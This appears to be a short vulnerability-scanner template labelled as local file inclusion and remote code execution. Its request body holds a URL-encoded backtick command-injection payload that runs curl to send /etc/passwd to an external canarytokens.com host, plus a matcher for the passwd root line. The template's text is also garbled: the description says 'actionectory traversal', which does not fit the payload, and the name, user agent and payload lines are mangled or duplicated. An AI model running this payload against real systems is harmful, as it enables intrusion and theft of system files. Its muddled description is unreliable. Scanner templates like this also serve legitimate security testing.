id: lfi-rce

info:
  name: Local File Inclusion$rce
  author: pelo
  severity: high
  description: |
     actionectory traversal via the GET /.. substring.

  tags: lfi-rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    body: 
          var=%60curl%20-F%22file=@/etc/passwd%22%20dk7l6aogliio5m7zsytg6gm6i.canarytokens.com
           %60curl%20-F%22file=@/etc/passwd%22%20dk7l6aogliio5m7zsytg6gm6i.canarytokens.com
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

